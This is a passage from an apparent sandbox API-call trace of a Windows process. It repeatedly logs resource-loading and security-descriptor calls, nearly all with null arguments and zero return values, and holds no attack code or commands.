returned 0x0 [0220.141] LockResource (hResData=0x0) returned 0x0 [0220.141] FreeResource (hResData=0x0) returned 0 [0220.141] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.141] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.141] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.141] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.141] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.141] LockResource (hResData=0x0) returned 0x0 [0220.141] FreeResource (hResData=0x0) returned 0 [0220.141] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.141] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.141] LockResource (hResData=0x0) returned 0x0 [0220.141] FreeResource (hResData=0x0) returned 0 [0220.141] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.141] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.141] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.141] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.141] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.141] LockResource (hResData=0x0) returned 0x0 [0220.141] FreeResource (hResData=0x0) returned 0 [0220.141] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.141] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.141] LockResource (hResData=0x0) returned 0x0 [0220.141] FreeResource (hResData=0x0) returned 0 [0220.141] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.141] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.141] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.141] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.141] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.141] LockResource (hResData=0x0) returned 0x0 [0220.141] FreeResource (hResData=0x0) returned 0 [0220.141] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.141] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.141] LockResource (hResData=0x0) returned 0x0 [0220.141] FreeResource (hResData=0x0) returned 0 [0220.142] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.142] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.142] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.142] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.142] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.142] LockResource (hResData=0x0) returned 0x0 [0220.142] FreeResource (hResData=0x0) returned 0 [0220.142] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.142] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.142] LockResource (hResData=0x0) returned 0x0 [0220.142] FreeResource (hResData=0x0) returned 0 [0220.142] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.142] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.142] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.142] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.142] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.142] LockResource (hResData=0x0) returned 0x0 [0220.142] FreeResource (hResData=0x0) returned 0 [0220.142] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.142] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.142] LockResource (hResData=0x0) returned 0x0 [0220.142] FreeResource (hResData=0x0) returned 0 [0220.142] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.142] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.142] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.142] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.142] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.142] LockResource (hResData=0x0) returned 0x0 [0220.142] FreeResource (hResData=0x0) returned 0 [0220.142] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.142] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.142] LockResource (hResData=0x0) returned 0x0 [0220.142] FreeResource (hResData=0x0) returned 0 [0220.142] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.142] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.142] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.142] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.142] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.142] LockResource (hResData=0x0) returned 0x0 [0220.142] FreeResource (hResData=0x0) returned 0 [0220.142] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.142] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.142] LockResource (hResData=0x0) returned 0x0 [0220.142] FreeResource (hResData=0x0) returned 0 [0220.142] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.142] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.142] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.142] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.142] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.143] LockResource (hResData=0x0) returned 0x0 [0220.143] FreeResource (hResData=0x0) returned 0 [0220.143] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.143] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.143] LockResource (hResData=0x0) returned 0x0 [0220.143] FreeResource (hResData=0x0) returned 0 [0220.143] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.143] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.143] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.143] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.143] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.143] LockResource (hResData=0x0) returned 0x0 [0220.143] FreeResource (hResData=0x0) returned 0 [0220.143] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.143] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.143] LockResource (hResData=0x0) returned 0x0 [0220.143] FreeResource (hResData=0x0) returned 0 [0220.143] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.143] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.143] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.143] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.143] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.143] LockResource (hResData=0x0) returned 0x0 [0220.143] FreeResource (hResData=0x0) returned 0 [0220.143] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.143] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.143] LockResource (hResData=0x0) returned 0x0 [0220.143] FreeResource (hResData=0x0) returned 0 [0220.143] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.143] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.143] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.143] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.143] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.143] LockResource (hResData=0x0) returned 0x0 [0220.143] FreeResource (hResData=0x0) returned 0 [0220.143] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.143] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.143] LockResource (hResData=0x0) returned 0x0 [0220.143] FreeResource (hResData=0x0) returned 0 [0220.143] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.143] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.143] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.143] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.143] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.143] LockResource (hResData=0x0) returned 0x0 [0220.143] FreeResource (hResData=0x0) returned 0 [0220.143] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.143] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.143] LockResource (hResData=0x0) returned 0x0 [0220.143] FreeResource (hResData=0x0) returned 0 [0220.144] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.144] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.144] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.144] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.144] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.144] LockResource (hResData=0x0) returned 0x0 [0220.144] FreeResource (hResData=0x0) returned 0 [0220.144] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.144] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.144] LockResource (hResData=0x0) returned 0x0 [0220.144] FreeResource (hResData=0x0) returned 0 [0220.144] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.144] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.144] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.144] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.144] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.144] LockResource (hResData=0x0) returned 0x0 [0220.144] FreeResource (hResData=0x0) returned 0 [0220.144] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.144] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.144] LockResource (hResData=0x0) returned 0x0 [0220.144] FreeResource (hResData=0x0) returned 0 [0220.144] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.144] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.144] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.144] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.144] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.144] LockResource (hResData=0x0) returned 0x0 [0220.144] FreeResource (hResData=0x0) returned 0 [0220.144] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.144] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.144] LockResource (hResData=0x0) returned 0x0 [0220.144] FreeResource (hResData=0x0) returned 0 [0220.144] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.144] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.144] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.144] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.144] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.144] LockResource (hResData=0x0) returned 0x0 [0220.144] FreeResource (hResData=0x0) returned 0 [0220.144] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.144] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.144] LockResource (hResData=0x0) returned 0x0 [0220.144] FreeResource (hResData=0x0) returned 0 [0220.144] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.144] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.145] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.145] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.145] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.145] LockResource (hResData=0x0) returned 0x0 [0220.145] FreeResource (hResData=0x0) returned 0 [0220.145] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.145] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.145] LockResource (hResData=0x0) returned 0x0 [0220.145] FreeResource (hResData=0x0) returned 0 [0220.145] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.145] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.145] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.145] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.145] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.145] LockResource (hResData=0x0) returned 0x0 [0220.145] FreeResource (hResData=0x0) returned 0 [0220.145] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.145] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.145] LockResource (hResData=0x0) returned 0x0 [0220.145] FreeResource (hResData=0x0) returned 0 [0220.145] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.145] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.145] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.145] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.145] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.145] LockResource (hResData=0x0) returned 0x0 [0220.145] FreeResource (hResData=0x0) returned 0 [0220.145] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.145] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.145] LockResource (hResData=0x0) returned 0x0 [0220.145] FreeResource (hResData=0x0) returned 0 [0220.145] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.145] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.145] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.145] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.145] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.145] LockResource (hResData=0x0) returned 0x0 [0220.145] FreeResource (hResData=0x0) returned 0 [0220.145] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.145] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.145] LockResource (hResData=0x0) returned 0x0 [0220.145] FreeResource (hResData=0x0) returned 0 [0220.145] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.145] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.146] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.146] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.146] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.146] LockResource (hResData=0x0) returned 0x0 [0220.146] FreeResource (hResData=0x0) returned 0 [0220.146] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.146] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.146] LockResource (hResData=0x0) returned 0x0 [0220.146] FreeResource (hResData=0x0) returned 0 [0220.146] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.146] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.146] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.146] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.146] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.146] LockResource (hResData=0x0) returned 0x0 [0220.146] FreeResource (hResData=0x0) returned 0 [0220.147] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.147] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.147] LockResource (hResData=0x0) returned 0x0 [0220.147] FreeResource (hResData=0x0) returned 0 [0220.147] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.147] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.147] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.147] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.147] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.147] LockResource (hResData=0x0) returned 0x0 [0220.147] FreeResource (hResData=0x0) returned 0 [0220.147] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.147] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.147] LockResource (hResData=0x0) returned 0x0 [0220.147] FreeResource (hResData=0x0) returned 0 [0220.147] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.147] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.147] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.147] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.147] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.147] LockResource (hResData=0x0) returned 0x0 [0220.147] FreeResource (hResData=0x0) returned 0 [0220.147] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.147] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.147] LockResource (hResData=0x0) returned 0x0 [0220.147] FreeResource (hResData=0x0) returned 0 [0220.147] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.147] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.148] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.148] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.148] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.148] LockResource (hResData=0x0) returned 0x0 [0220.148] FreeResource (hResData=0x0) returned 0 [0220.148] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.148] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.148] LockResource (hResData=0x0) returned 0x0 [0220.148] FreeResource (hResData=0x0) returned 0 [0220.148] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.148] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.148] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.148] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.148] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.148] LockResource (hResData=0x0) returned 0x0 [0220.148] FreeResource (hResData=0x0) returned 0 [0220.148] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.148] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.148] LockResource (hResData=0x0) returned 0x0 [0220.148] FreeResource (hResData=0x0) returned 0 [0220.148] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, 